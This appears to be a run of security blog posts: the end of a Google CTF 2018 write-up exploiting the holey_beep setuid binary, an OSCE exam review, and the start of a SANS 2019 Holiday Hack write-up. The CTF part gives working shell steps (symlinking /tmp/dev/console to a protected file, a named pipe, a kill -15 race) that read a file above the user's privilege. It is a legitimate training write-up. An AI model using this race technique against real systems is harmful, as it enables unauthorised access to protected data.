holey_beep: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=6fe5703ed40e673f85df5a7332b9ad3d94a17c99, not stripped

If we look back into our previous challenge, once we got code execution we also see that the holey_beep binary is present there as well.

> $ ls -la
total 52
drwxr-xr-x 3 user   user     4096 Oct 24 19:04 .
drwxr-xr-x 4 nobody nogroup  4096 Oct 24 19:04 ..
-rw-r--r-- 1 user   user      220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 user   user     3771 Aug 31  2015 .bashrc
-rw-r--r-- 1 user   user      655 May 16  2017 .profile
-r-sr-xr-x 1 admin  user     9000 Sep 26 15:44 holey_beep
-r-xr-xr-x 1 user   nogroup 18224 Sep 26 15:44 todo
drwxrwxrwt 2 user   user       80 Mar  1 00:49 todos

Fortunately for us this challenge gave us a big hint by providing info on the Holey Beep vulnerability which allowed for privilege escalation via a race condition in the beep binary file. There’s a very good blog called β€œHoleyBeep: Explanations and exploit” that details the vulnerability and exploitation process that I highly suggest you read.

But before we go off track, let’s open the binary in IDA and see what the binary really does.

So as detailed in the image, the application installs a signal 15, (hence 0F in hex) via the signal function. This signal checks for the SIGTERM signal form the application. The application then goes to check if we have more than 1 argument. If we don’t it prints out a usage for us, otherwise it jumps to loc_A21 which seems to be configuring a FOR loop.

The C code for this part of the application will look like the following:

int __cdecl main(int argc, const char **argv, const char **envp)
{
	const char **v1;
	v1 = argv;
	if (signal(15, handle_sigterm) == (__sighandler_t)-1LL)
		err(1, "signal", argv);
	if (argc <= 1)
		errx(1, "usage: holey_beep period1 [period2] [period3] [...]", argv);
	for (i = 1; i < ?; ++i)
	{
	}
	return 0;
}

Let’s look deeper into the application to see what else is going on.

So it seems the FOR loop is using our argument counter, and for each argument it sets up a new variable called device which attempts to open dev/console via the open function. So this seems to be a bug since isn’t this supposed to be /dev/console?

After that it checks to make sure that the device integer is less than 0, if it is, it prints an error.

So knowing that, the updated C code for this should look like so.

int __cdecl main(int argc, const char **argv, const char **envp)
{
	const char **v1;
	v1 = argv;
	if (signal(15, handle_sigterm) == (__sighandler_t)-1LL)
		err(1, "signal", argv);
	if (argc <= 1)
		errx(1, "usage: holey_beep period1 [period2] [period3] [...]", argv);
	for (i = 1; i < argc; ++i)
	{
		device = open("dev/console", 0, v1);
		if ((signed int)device < 0)
			err(1, "open(\"dev/console\", O_RDONLY)");
	}
	return 0;
}

Let’s continue exploring the application.

Here we see that after the open function is called and is successful, atoi is called against the argv parameter and sets the output to a new variable.

Then it check is the ioctl or input-output control is less than 0, if so it prints an error via fprint. If not it closes the device via the close function.

So the full C code for this application should be as follows.

int __cdecl main(int argc, const char **argv, const char **envp)
{
	const char **v1;
	v1 = argv;
	if (signal(15, handle_sigterm) == (__sighandler_t)-1LL)
		err(1, "signal", argv);
	if (argc <= 1)
		errx(1, "usage: holey_beep period1 [period2] [period3] [...]", argv);
	for (i = 1; i < argc; ++i)
	{
		device = open("dev/console", 0, v1);
		if ((signed int)device < 0)
			err(1, "open(\"dev/console\", O_RDONLY)");
		v2 = atoi(v1[i]);
		if (ioctl(device, 0x4B2FuLLm, v2) < 0)
			fprintf(stderr, "ioctl(%d, KIOCSOUND, %d) failed." (unsigned int)device, v2);
		close(device);
	}
	return 0;
}

Alright, so we got most of the code, but we are still missing part of it. We still don’t know what the handle_sigterm function is doing. So let’s dig into that by double clicking it.

So we can see that this function checks to see if the device is less than or equal to 0, and if the ioctl of the device us less then 0. If so it prints out debug data that seems to be of 1023 bytes or 3FF in hex which is passed to the buffer via the read function.

The code for this function can be seen as such.

void __noreturn handle_sigterm()
{
	char buf;
	if ((signed int)device >= 0 && ioctl(device, 0x4B2FuLL, 0LL) < 0 )
	{
		fprintf(stderr, "ioctl(%d, KIOCSOUND, 0) failed.", (unsigned int)device);
		memset(&buf, 0, 0x400uLL);
		read(device, &buf, 0x3FFuLL);
		fprintf(stderr, "debug_data: \"%s\"", &buf);
	}
	exit(0);
}

Awesome, so we know how this whole application functions! We also know what there is an bug with the open function when it tries to open dev/console, which means we can possibly create a file such as /tmp/dev/console and launch the binary from tmp then it will launch the console from our directory. This console file can then be a symbolic link to our flag!

Once that’s done we then need to somehow figure out a way to send a SIGTERM signal (kill -15) so that it actually reads the flag and outputs the contents.

So for this signal to be sent in the proper location we can utilize a possible race condition exploit in this application. Since the application takes in arguments via for (i = 1; i < argc; ++i) then we can try and send multiple arguments to make the loop slow, and then attempt to send the kill signal.

For this race condition we can use the seq function to send multiple arguments from 1 to oh I don’t know, like 5000. We can also cause this to be way slower by abusing the fprintf function.

Notice how the fprintf function only outputs to stderr. So what we can do is redirect this standedr output of errors to a named pipe such as mkfifo, then as soon as the kernel buffer for that pipe fills up, it will stop and freeze until it’s read from the other side. And as long as we don’t read from the other side, we then allow ourselves to abuse this race condition to send the kill signal.

So with that knowledge, let’s use our previous exploit to get a shell, and navigate to the /tmp folder.

> $ sh
$ cd /tmp

From there let’s make a new directory called dev. Once the folder is created let’s make a new symbolic link to from the secret_cake_recipe file to /tmp/dev/console - since remember, we want to abuse dev/console that’s hard coded.

Then let’s make a new named pipe called fake in the tmp folder which will be used for our race condition.

$ mkdir dev
$ ln -s /secret_cake_recipe /tmp/dev/console
$ mkfifo /tmp/fake
$ ls -la
total 4
drwxrwxrwt  3 user user   80 Mar  1 01:12 .
drwxr-xr-x 22 user user 4096 Oct 24 19:10 ..
drwxr-xr-x  2 user user   60 Mar  1 01:12 dev
prw-r--r--  1 user user    0 Mar  1 01:12 fake
$ ls -la dev
total 0
drwxr-xr-x 2 user user 60 Mar  1 01:12 .
drwxrwxrwt 3 user user 80 Mar  1 01:12 ..
lrwxrwxrwx 1 user user 19 Mar  1 01:12 console -> /secret_cake_recipe

Once we have all that set up, we can now exploit the race condition.

We will start by calling the holey_beep binary, provide it a lot of arguments via the seq function, redirect the standard error to our named pipe, and finally allow all that to run in the background via the & parameter since we need to get the binary’s pid so we can send our signal.

$ /home/user/holey_beep $(seq 1 1 5000) 2> /tmp/fake &

Once that’s called, we will then want to call a sleep function that will wait some time, and then once that time is over, we will read the standard input of the named pipe.

The reason we do this is because our flag will be somewhere in that buffer since handle_sigterm writes the debug data to stander error as well. Once we send the kill function it should trigger the symbolic link and read the flag which should be sent to our named pipe and then printed out on our side.

We will run this sleep function again in the background so we can get the pid of the holey_beep file. To do that we will use the pgrep function.

Alright, with that let’s go ahead and execute the following sleep function, get the process id of the binary, and then send the kill signal.

$ ( sleep 30; cat - ) < /tmp/fake &
$ pgrep holey_beep
13
$ kill -15 13

Once completed wait a few seconds and you should then get output on your screen from the named pipe.

---trim---
4, KIOCSOUND, 2016) failed.ioctl(4, KIOCSOUND, 2017) failed.ioctl(4, KIOCSOUND, 2018) failed.ioctl(4, KIOCSOUND, 0) failed.debug_data: "== Secret recipe for the CTF{the_cake_wasnt_a_lie} cake ==

The Pittsburgh Engineer’s Cake (This is the maximum of the final Gaussian Process model, trained
on all the Pittsburgh Trials, including transfer learning.)

    Mix together flour, baking soda, and cayenne pepper. Then, mix the sugar, egg, butter (near refrigerator
temperature), and other ingredients until nearly smooth; it takes about 2 minutes in a counter-top stand mixer
with a flat paddle blade. Add the dry ingredients and mix just until the dough is uniform; do not over-mix. Spoon
out onto parchment paper (we used a #40 scoop, 24 milliliters), and bake for 14 minutes at 175C (350β—¦
F).

β€’ 167 grams of all-purpose flour.
β€’ 186 grams of dark chocolate chips.
β€’ 1/2 tsp. baking soda.
β€’ 1/4 tsp. salt.
β€’ 1/4 tsp. cayenne pepper.
β€’ 262 grams of sugar (75% medium brown, 25% white).
β€’ 30 grams of egg.
β€’ 132 grams of butter.
β€’ 3/8 tsp. orange extract.
β€’ 1/2 tsp. vanilla extract.

https://research.google.com/pubs/archive/46507.pdf

And just like that, we exploited the race condition and got our flag!

FLAG: CTF{the_cake_wasnt_a_lie}

Closing

And there we have it ladies and gentleman, we completed the 2018 Google CTF: Beginners Quest!

I’ve got to say, that the final PWN challenges were actually very challenging, even for me! It just really goes to show you how many crazy vulnerabilities are out there in the wild and what it takes to find and exploit them.

This CTF was a great learning experience and I hope that it allowed you all to learn something new as well.

With that, I close this series of posts!

Thanks for reading!

Offensive Security’s CTP & OSCE Review

22 August 2019 at 00:00

On August 22, 2019 I received yet another one of the most desired emails by aspiring Offensive Security enthusiasts and professionals…

Dear Jack,

We are happy to inform you that you have successfully completed the Cracking the Perimeter certification exam and have obtained your Offensive Security Certified Expert (OSCE) certification.

It was finally over! I accomplished what I believed to be, as of yet, the hardest certification exam I have attempted! After a grueling year of training after my OSCP, followed by a month in the lab, and two 48 hour exam retakes, it all paid off at the end - I was finally an OSCE!

Now when people told me that the OSCE was a monster all on its own, I really didn’t believe them. Well, that was until I failed my first exam attempt and got a taste for myself. Failing the exam led me to explore new technique and tactics, and took me down a pretty interesting rabbit hole that actually taught me a great deal of new things!

So as I write this post, I want to share my thoughts, experiences, and some tips for those who are aiming to achieve the OSCE. Because trust me when I say… you’ll need them!

Background & Experience

Before I delve into the CTP Course and the OSCE, I want to provide you with some information on my background and experience. At time of writing this post I have been in the InfoSec Industry for ~5 years now. I completed my OSCP back in 2017 and detailed my previous background, and experience in my Offensive Security’s PWK & OSCP Review blog post. Since then I have learned a great deal of new things and at the time of writing this work as a Security Consultant and Red Team Operator at NCC Group.

Much of the learning I did to prepare me for the OSCE was done outside of work by reading books, practicing in HackTheBox, and competing in CTF’s such as the 2018 Google CTF. A big reason I perused the OSCE was not to learn exploit development but to gain new skills that would make me a better red teamer in terms of being able to develop new tools, bypass anti-virus and EDR, to even learning how to fuzz and build more complex exploits if the need was to arise.

Now, do you need to hold the same experience to pass the OCSE? Absolutely not! I firmly believe that if you passed your OSCP, and took the time to learn more about web application vulnerabilities, x86 assembly and some windows internals, then you would be more than ready to attempt this course! I will delve a bit deeper on the specific studies you need to succeed a little later on, but for now, let’s get into the meat of the review!

The CTP Course & Lab

Unlike the OSCP, the OSCE doesn’t have a dedicated practice lab. In fact, the CTP course and lab are tied in together - making it more of a walkthrough and β€œfollow along” then a self-taught course, which is then followed by the OSCE exam. You have an option to register for either 30 or 60 days of lab time. Once registered, on your assigned course start date you’ll be provided access to download all your course materials. The materials include the ~4-hour Offensive Security CTP course videos, the 145-page CTP PDF course, and your VPN lab access.

When I started my OSCE journey I opted for 30 days as I thought that this would be a decent amount of time to cover the material, and spend some time practicing and honing the techniques taught to me. I don’t recommend opting in for 60 days as I believe that you won’t get much benefit from the additional days due to the fact that you can pretty much cover the whole course and more in the 30 day time span.

Just as with the OSCP, it’s recommended that you go through both the PDF and Videos as the videos sometimes have more details then the PDF. The course teaches some more advanced penetration testing skills and cover topics such as:

  • Web Application Attacks (XSS/LFI to RCE)
  • Backdooring PE Files
  • Bypassing Antivirus Systems
  • Bypassing ASLR on Windows Vista
  • Crafting and Using Egghunters
  • Fuzzing & 0Day Development
  • Encoding Shellcode & Bypassing Restrictions
  • Attacking Network Infrastructure

It took me about 2 weeks to get through all the materials in the course, not because it was long, but because some of the material and exercises were quite hard - and you really needed to put in some effort to make things work. Even though some of the material was hard, the learning experience was phenomenal. Fact, much of the material is a tad bit outdated - ranging back to the XP and Vista days - but even so the course did an excellent job on teaching you the basics of the exploit development life cycle and its associated techniques.

Now, I must give you a stern warning - just like the PWK course, the CTP will not and does not provide you with everything you need to know, but it does hint you on what you need to learn to pass the exam. So I highly suggest to spend time doing additional research and practice after the course.

Since the course and lab are tied together - I will briefly go over what you can expect. The lab itself only has a total of 4 virtual machines that contain all the tools and software you need to practice and complete the exercises. Now thankfully, unlike the OSCP, you don’t have to write up a report for the exercises! =)

Within these four machines you’ll practice the different topics stated above, and will be asked to mix and match what you have learned so far to create more complex exploit - such as bypassing a different antivirus, or using a 3-byte overwrite to execute your egg hunter. The exercises are pretty easily followed, but make no mistake, the devil is in the detail and if you don’t pay attention or spend time doing additional research on the topics, and you’ll have a hard time understanding everything.

After my 30 days were up, I decided to do some more practice before scheduling my exam. I went to exploit-db and looked for simple vulnerabilities in applications that I could practice on. After 2 more weeks of practice and reading blogs, I decided to attempt my OSCE exam and locked in the time for May 26th at 12PM.

The OSCE Exam - Attempt #1

If you thought the OSCP was hard, then you’re in for a surprise. This soul crushing, gut wrenching, 48-hour exam is in all honesty the hardest I ever attempted - and by god did I love it. This exam really makes you demonstrate creative problem solving and your ability to think laterally while performing effectively under pressure to execute attacks in a controlled and focused manner.

For the exam, you are allocated 4 machines, and are allowed RDP/VNC access to 2 of them to build and debug your exploits for 3 of the 4 objectives. As with the OSCP, each machine has certain objectives that you need complete in order for your points to count. Along with that, automated tools like Brup Pro, Metasploit AutoPwn, etc. are restricted, but you can still use Metasploit. In order to pass you need to score 75/90 points. I highly suggest you read the OSCE Exam Guide for more details on what is and isn’t allowed during the exam.

01 x 12PM: Doesn’t Seem Hard!

Finally, May 26th came around. With some early morning breakfast in me and a coffee in my hand, I was sitting at my computer listening to some Monstercat when I received my exam information and VPN access from OffSec. β€œLet’s do this!” I thought to myself as I read the instructions, noted the objectives and began working on the first β€œeasy” objective.

01 x 3PM: I Fu**ed Up:

Approximately 3 hours after my initial start time I came to realize something… and that something was that I messed up, badly. I misread the objective and went down a complete rabbit hole that didn’t work. I only came to realize my error when I went back and slowly re-read the objective. I was fuming! I wasted three hours of my time to not only realize that I was doing it wrong, but that the solution for the challenge was going to be much more complex then originally thought. I knew what I had to do, but it was going to be time consuming… oh well.

01 x 5PM: It’s not working…

After catching my mistake, I took a quick 5 minute breather, got something to drink and off I went working on my exploit. Two hours later I crafted my initial exploit and had it working on a local test machine I set up for myself - but for some reason the exploit would not work on the debugging machine! Why?! After a few more trial and error tests I decided to leave this objective for later and moved onto the next one.

01 x 7PM: You’re kidding me, right?

After wasting a lot of time on the first objective I decide to move onto the next β€œeasy” objective. I was 7 hours into the exam and still haven’t gotten a single point, but I told myself not to give up - I still had 41 hours left. I began working on my second objective using techniques that I learned from the course and from some blogs that I read. Everything was working as intended and doing what it was supposed to… but the final result was unsuccessful.

β€œYou’re kidding me, right?!” I yelled, as I knew that this technique had to work, but something was just not right! I found myself trying new techniques, googling, rebuilding my shellcode, googling some more, and updating my shellcode again, but even that wasn’t enough. I couldn’t finish the objective. Feeling down, I decided to come back to this later as well and moved onto the third objective.

01 x 8:30PM: Okay, I got this… Guess not.

At this point I opted to take a small break and eat some dinner to relax. I was in a bad spot. 9 hours in and I wasn’t making progress but I had hope that I could still pass! After my short break I sat down at my computer, took a deep breath, and off I went attempting the third objective. Within an hour I made some progress, found the vulnerability, and was able to somewhat exploit it but not fully.

For the next 4 hours, I was at a roadblock. I knew how to exploit the vulnerability to get a shell, but I couldn’t for the life of me find the exact location needed. I spent hours googling, researching, and testing techniques but nothing worked. At this point I found myself bouncing back and forth between the three challenges and decided that I need to sleep… I was exhausted!

02 x 1AM: Down but not out!

It was late. After 13 hours into the exam, and zero points under my belt I felt defeated. This exam was harder than I thought and at this point I started to come to terms that I might fail. Even though I got no points, I made some progress and the exam was not yet over! I still had a fighting change! With that mind set I went to bed hoping that the next day would be better.

02 x 10AM: Well did you RTFM!?

Day 2 arrived! With the sun shining through my window I woke up at 9AM, ate some breakfast, made some coffee and off I went to work on the exam. I focused my efforts on the first objective again and slowly re-read the objectives to make sure I wasn’t doing anything wrong.

Oh… Oops! After re-reading the objectives again I noticed that I missed a critical piece of β€œadditional” information. But surely that wasn’t it, right? Oh boy was I wrong! I followed the additional information and within 50 minutes I got a working exploit! I jumped up and screamed for joy! I can’t believe I failed to see this in the first place, boy did I felt stupid.

Oh well, with that successful exploit I attained 15 points! I felt ecstatic, filled with new energy I believed that I now had a fighting chance!

02 x 6PM: Two wrongs make a right, I guess…

After getting the first objective, I spent the next six hours jumping between the third and fourth objectives - some fuzzing here, some googling there, some CTP course magic here, the wrong google search here… wait what? Wrong google search? β€œThis isn’t what I wanted! Oh, hey, wait a second…” I thought to myself as I came across a forum post while doing research for how to exploit the third objective. The post wasn’t really what I was looking for, but lo and behold it actually was! Using my new found information and after some trial an error, I was able to obtain my second shell, bringing me up to 30 points!

Yes! I celebrated with a victory lap around the house and thought that maybe I can still pass!

02 x 9PM: Hello Access Violation!

During the time I was working on the third objective, I was fuzzing the forth objective - but had no success. Being a little tired and hungry, I decided to write a script that would automate the fuzzing for me. With the script completed, I kicked it off and stepped away for an hour to eat and rest. Once my break was over I got back and was bestowed by the holy grail of exploit development - β€œAccess Violation”.

I was thrilled! Within 15 minutes I was able to jump into my controlled buffer. I then set off to build a simple python proof of concept to use as my skeleton exploit. Now came the hard part, crafting a working exploit that would bestow me with a shell!

03 x 6AM: That’s impossible!

9 hours went by since I got control of my malicious buffer… 9 hours of hard work, testing shellcode and applying new techniques, but all of that was for nothing. Nothing seemed to work, this objective was literally impossible! There was one major road block that was killing me, the same thing that usually kills all exploit development, and it was right there staring me in the face with its evil little grin.

I didn’t know what to do.

03 x 9AM: Defeated!

I was exhausted and only had 3 hours left before the exam was over. With only 30 points under my belt, an unfinished challenge, and an impossible exploit - I knew this was over, I won’t pass. I choked up a little, and made up my mind to call it quits. I was defeated, it was over, my dream of becoming an OSCE… shattered.

I sulked my way over to my bed and fell asleep.

Intermission - Back to the Basics

I was quite miserable after failing the exam, it was way harder than previously thought. At first I blamed OffSec for not teaching the required techniques needed to pass, but after talking to some friends, reading the forums, and going through the course again I came to realize something. OffSec did prepare me for the exam, everything that I needed to know and learn more in depth was provided in the course - maybe not directly stated, but it was there.

Here’s the beautiful thing about Offensive Security. It’s that they first hold your hand through the course and teach you the techniques needed to understand the basics, but after that they throw you into the deep end of the pool to learn on your own. While it might seem a bit brash at first, it really isn’t because Offensive Security want’s to teach you to be creative, think laterally and to be detailed oriented. If you pay more attention to the course and exam you’ll notice that the devil is in the details and that OffSec pretty much points you in the right direction or gives you hints for the challenges.

With a new found love for Offensive Security, a fresh mindset and the willingness to learn, I opted to take a 2 week break and returned to my studies shortly after.

I first started by going through the exam objectives again, spending about two hours reading them, taking notes and trying to read in between the lines. Unfortunately for me when I did this I noticed things I missed during the exam - which just goes to show that you really need to pay attention during the course and exam.

After taking notes, I did some OSINT (Open Source Intelligence Gathering) on Offensive Security’s website for the CTP/OSCE and looked at the β€œWhat competencies will you gain?” section. A few points stood out to me, such as β€œunderstanding of PE structures”, β€œinnovative ways of penetrating internal networks”, as well as the β€œability to work through encoding issues and space restrictions”.

Once my notes were completed, I went through the CTP course again and tried to focus on items that I knew would help me on the exam. Afterwards I went online and googled for the topics that I noted previously and to be honesty they really helped me understand the course and objectives in depth. This not only reflected back to the OSCE exam later but also helped me become a better red teamer as I learned new things such as PE Injections, some new internal network pivoting and attack techniques, and more!

While also reading and studying the new found material, I created a simple Windows XP lab that I used to practice on. I tried to craft the lab to resemble the OSCE exam as close as possible. This was fantastic for me as I got the opportunity to test techniques, learn the ins and outs of the OllyDbg debugger, and also got to play with shellcoding and the Windows API locally.

My additional study period lasted about two months and I believe that it was greatly beneficial for me. After all that I felt ready to go after my second OSCE attempt, and locked in the date of August 15th, 2019 at 2PM. Once the date was locked in I actually started working and drafting my OSCE report to save me time if I was to pass the next exam retake.

The OSCE Exam - Attempt #2

Finally, August 15th came around. I woke up at 10AM and followed my regular daily routine. The days leading up to my exam I spent away from the computer enjoying a small vacation, so I was relaxed and well rested. I decided to take a short walk outside as the weather was nice to relax and focus on what I had to do. By 1:30PM I was sitting at my computer reading through all my notes and making mental notes of what I needed to focus on.

I had some proof of concepts created from my previous attempt that I fine-tuned throughout my study period. I knew that these proof of concepts were the answers to objectives, all that was left was to implement them properly. Sure enough, at 2PM I got the email from OffSec with my exam information. After setting everything up, I took a deep breath and dived right into the first objective.

01 x 6PM: I’m on fire!

4 hours after my initial start time and I was on fire as I managed to take out 2.5 of the 4 objectives! This put me in a good position with 45 points under my belt. I did have some issues on the first objective such as my math being off and some stack alignment issues, but that was easily solved thanks to all the prep work I did. It was smooth sailing!

The second objective was taken out shortly after the first. Thanks to all the reading that I did, I knew why my previous attempts didn’t work. A shell on the third objective followed directly after. I jumped for joy and did a lap around my house celebrating. Being ecstatic that everything was falling into place, I decided to take my energy and focus on the fourth β€œimpossible” objective.

01 x 8PM: Peekaboo! I see you!

There’s a reason the forth objective is considered β€œimpossible”, and that’s because it literally forces you to think laterally and like an actual attacker to accomplish the objective. I was able to fuzz and crash the application with my proof of concept, I had control of my malicious buffer - but I still didn’t know how to exploit the vulnerability to get a shell.

So I did the only thing I could, and that was to put on my Red Team face on and play the role of a persistent attacker. After an hour of digging I found something very promising and luckily for me this topic was briefly presented in the course! So I built a quick proof of concept and was able to get a remote shell on the debugging machine. I just found the shell vector… but now the question was, how the heck do I craft this into my exploit?

01 x 11PM: Work dammit!

After finding the exploit vector to obtain a shell for the forth objective I decided to step away for an hour to eat and relax. I had to figure out a way to execute this exploit remotely, but how? This question stuck with me the whole time while I was eating. It wasn’t until me and my dad were talking about doing some custom work on our kitchen that it struck me… CUSTOM! Yes that’s it! How could have I missed this?! I needed to build custom shellcode to get past the restrictions, it was the only viable option!

By 10PM I was at my computer again doing some googling, and crafting custom shellcode to exploit the vulnerability. I crafted some shellcode on my local XP machine and verified that it worked; I finally found the solution to the objective! So I did the next best thing and tested it on the debugger machine hoping that it would work… but it didn’t. That little evil roadblock was still there, staring back at me with more than just a grin this time. I needed to find a way to optimize the shellcode, but attempt after attempt, I still couldn’t get it to work.

02 x 1AM: Let me sleep on it.

It was getting late. 11 hours into the exam and I knew that I was close to passing, but I kept hitting roadblocks. I was able to do some code optimization but I was still missing a critical piece of information to make the shellcode work properly. I decided to step away for the day and go to sleep. I knew I would pass, so might as well get a good night of sleep… right?

02 x 10AM: Ever heard of backups?

The 2nd day started off very well for me actually. I woke up at 9AM, followed my daily routine, and by 10AM I was at my computer again getting ready to tackle the final challenge! I started up my VM and was greeted by a β€œOh no! Something has gone wrong. A problem has occurred and the system can’t recover” message.

My reaction was something along the lines of…

I had to recover my data somehow! This is a VM right? So that means I have a snapshot somewhere, right? Wrong! I never backed up the data on my exam VM… lovely. Fortunately for me I was able to boot the VM into recovery mode and figured out that the error occurred in Xorgs. Thankfully that was easily fixed and I was able to log back into my system after an hour. Phew, crisis averted.

Maybe this a good time to remind you to back up your data or take snapshots of your VM’s!

02 x 2PM: Not so fast cowboy!

With the data crisis averted, I got back to work trying hard to optimize my shellcode. I made some good progress, some CTP magic here, some googling here and I was really close! But yet again I was at a roadblock, I was missing something critical. What could it be? I started to lose hope after a few hours and even considered giving up - but I told myself that I will β€œTry Harder” and continued to push forward.

02 x 6PM: The devil IS in the details…

I was so close to passing that I could taste it! I only needed to tweak my shellcode a little and I would get my exploit to work, but I couldn’t put my finger on what optimization I needed. At this point I decided to take a step back and walked to the kitchen to make some food and tea. As I sat in the kitchen my dad came and asked me how the exam was going, to which I responded with my current status. After listening to me he told me that I was probably over thinking it, and to relax, explaining that I will figure it out.

Overthinking? Impossible! I was thinking laterally… that’s what OffSec wanted, right? Okay, I was in the same situation during my OSCP exam, so I returned back to my computer and decided to start from the basics. After some step by step debugging I noticed something simple that I previously overlooked. At first I didn’t think much of it until I started to think about how I can use this in my shellcode. After some thinking and fiddling around, I made a small adjustment to my shellcode, held my breath, and kicked it off against the server.

Boom… shell! I jumped out of my chair and screamed! I got it, it worked! This shell bestowed me with an additional 30 points, brining me up to 75 points - enough to pass! I was so hyped but also disappointed with myself that I missed such a simple piece of information. Still I did it, I passed!

Wrapping it Up

With 75 points under my belt I decided to call it quits. I was tired and had a very busy weekend ahead of me, so I decided to finish up my report. I went back to gather all my screenshots, validate the exam requirements, and by 9PM I sent the report to OffSec which was about 98 pages long.

I received a response 5 days later from Offensive Security saying that I passed. It was finally over, I did it, I was an OSCE!

I’m honestly at a loss for words. This exam was very challenging and taught me a lot of new skills and techniques that I actually utilize day to day on my red team engagements. Sure, this course is more exploit development focused but it still teaches critical thinking and technical skills that can be utilized at your day to day job. I sincerely want to thank OffSec for this amazing experience and opportunity!

Tips & Recommendations

I know that many of you who will be reading this post will ask for tips/recommendations on either preparing to take the OSCE or on how/what to do during the exam. Well not to worry - in this section I will break down and include a lot of the materials I used to prepare for the OSCE as well as some tips/tricks to use for the exam.

Prerequisites:

In the CTP course, OffSec states that you need to understand the following fundamentals to take the course:

Cracking the Perimeter is an advanced course and requires prior knowledge of Windows exploitation techniques. You should be comfortable in OllyDbg and understand concepts such as shellcode encoding, use of the Metasploit Framework, and Linux at large.

Honestly speaking, this is very broad and there are quite a few more skills that you need to have to pass this course. I suggest taking a look at the full syallbus to get a better idea of what you need to know.

These skills are actually tested when you register for the CTP course. You will be provided a link to a web application and will need to pass a two stage registration challenge to even complete the registration. If for any reason you are having trouble completing the challenge, then you need to take a step back and go learn some more basics because if you can’t pass the registration challenge then you are not ready to attempt the course, nonetheless the OSCE exam.

If you are somewhat unfamiliar with x86 assembly, shellcoding, web application vulnerabilities, and basic exploitation, then here are some links to help you learn that required material:

I highly suggest that you complete all of the material above before attempting to register for the CTP/OSCE, trust me - you will thank me later if you do!

Practice:

Now that you have a fundamental understanding of the basics, you need to practice… a lot! If you follow the material above, then you should be able to pass the registration challenge and start the CTP course. After the course, I suggest you take the time to read and study additional material before attempting the OSCE exam.

The following materials below will help you practice and expand your skills.

This might seem like a ton of material at first, but do know that these topics will overlap and you will have a better understanding of each after the course. Don’t expect to know or learn this in one week! It will take you at least 2-3 months after your OSCP to be in a good position to go after your OSCE.

Exam Tips:

As with everything, there are always certain things that you should know and be doing during the OSCE Exam, these following tips should help you stay on focus and to stray away from rabbit holes.

  1. Read the objectives on the OSCE exam slowly, and VERY carefully.
  2. Pay attention to all the little details in the CTP course, the answers to parts of the exam are in there!
  3. Pay attention to all your registers in the debugger. What do they store, where do they point, etc.
  4. If you’re ever doing any calculations on an x86 stack such as aligning pointers, make sure that the calculations are divisible by 4, otherwise you’ll have stack alignment issues!
  5. Learn some hexadecimal arithmetic. The OSCE forum has a good post explaining it!
  6. Access Violation after your shellcode? Check to make sure you didn’t overwrite any important data in your registers or on the stack!
  7. Sometimes a direct approach isn’t feasible. Can you chain attacks to get the final result?
  8. Take frequent breaks. Opt for 15 minute break every 2 hours.
  9. Eat and drink! Make time for Lunch, and Dinner. Your brain needs food to function.
  10. Organize your notes, take screenshots, and document everything!
  11. You have 48 hours for the exam. Make sure you sleep at least 8 hours. There’s plenty of time to finish!
  12. Don’t give up to easily, and most importantly… β€œTry Harder!”.

SANS 2019 Holiday Hack Challenge

23 January 2020 at 00:00

Happy Holidays and a Happy New Year 2020 readers!

Thanks for joining me today as we go over the SANS 2019 Holiday Hack Challenge!

As always, SANS has done an amazing job at making this as fun as possible, while also being very educational!

I also want to give a quick shout out to the amazing Community from the CentralSec Slack Channel and from SANS for always helping everyone out and continuously teaching the community. This is what makes the InfoSec community amazing!

Just a quick heads up - this is a very comprehensive and long post. I will include an Index for you to be able to jump to a certain portion of the challenge; if you are only looking for solutions.

For others, the challenges are still available to play through - and will be till next year! So, if you want to follow along, or give it a go by yourself, then you can start here!

Introduction

This year the whole SANS Holiday Hack takes place at Elf University! Upon creating an account, and logging in, you are dropped in front of the ElfU train entrance.

From here, as well as from the Holiday Hack website, we get to follow the story and access our challenges.

The second we arrive at the train station, we are greeted by no other than the man in red himself, Santa!

Once we speak to Santa, we can then enter ElfU and continue on with our challenges (objectives)!

You can access the objectives, hints, talks, and achievements by clicking on the Christmas tree shaped badge on your character.

Objectives:

Once we access our Objectives, we see that we have twelve (12) questions that we need to answers. Hints to these objectives can be obtained by successful completing the associated Cranberry PI challenge, like every year so far!

The objectives, or questions that needed to be answers this year as follows:

  1. Talk to Santa in the Quad
    • Enter the campus quad and talk to Santa.
  2. Find the Turtle Doves
    • Find the missing turtle doves.
  3. Unredact Threatening Document
    • Someone sent a threatening letter to Elf University. What is the first word in ALL CAPS in the subject line of the letter? Please find the letter in the Quad.
  4. Windows Log Analysis: Evaluate Attack Outcome
    • We’re seeing attacks against the Elf U domain! Using the event log data, identify the user account that the attacker compromised using a password spray attack. Bushy Evergreen is hanging out in the train station and may be able to help you out.
  5. Windows Log Analysis: Determine Attacker Technique
    • Using these normalized Sysmon logs, identify the tool the attacker used to retrieve domain password hashes from the lsass.exe process. For hints on achieving this objective, please visit Hermey Hall and talk with SugarPlum Mary.
  6. Network Log Analysis: Determine Compromised System
    • The attacks don’t stop! Can you help identify the IP address of the malware-infected system using these Zeek logs? For hints on achieving this objective, please visit the Laboratory and talk with Sparkle Redberry.
  7. Splunk
    • Access https://splunk.elfu.org/ as elf with password elfsocks. What was the message for Kent that the adversary embedded in this attack? The SOC folks at that link will help you along! For hints on achieving this objective, please visit the Laboratory in Hermey Hall and talk with Prof. Banas.
  8. Get Access To The Steam Tunnels
    • Gain access to the steam tunnels. Who took the turtle doves? Please tell us their first and last name. For hints on achieving this objective, please visit Minty’s dorm room and talk with Minty Candy Cane.
  9. Bypassing the Frido Sleigh CAPTEHA
    • Help Krampus beat the Frido Sleigh contest. For hints on achieving this objective, please talk with Alabaster Snowball in the Speaker Unpreparedness Room.
  10. Retrieve Scraps of Paper from Server
    • Gain access to the data on the Student Portal server and retrieve the paper scraps hosted there. What is the name of Santa’s cutting-edge sleigh guidance system? For hints on achieving this objective, please visit the dorm and talk with Pepper Minstix.
  11. Recover Cleartext Document
    • The Elfscrow Crypto tool is a vital asset used at Elf University for encrypting SUPER SECRET documents. We can’t send you the source, but we do have debug symbols that you can use. Recover the plaintext content for this encrypted document. We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC. What is the middle line on the cover page? (Hint: it’s five words) For hints on achieving this objective, please visit the NetWars room and talk with Holly Evergreen.
  12. Open the Sleigh Shop Door
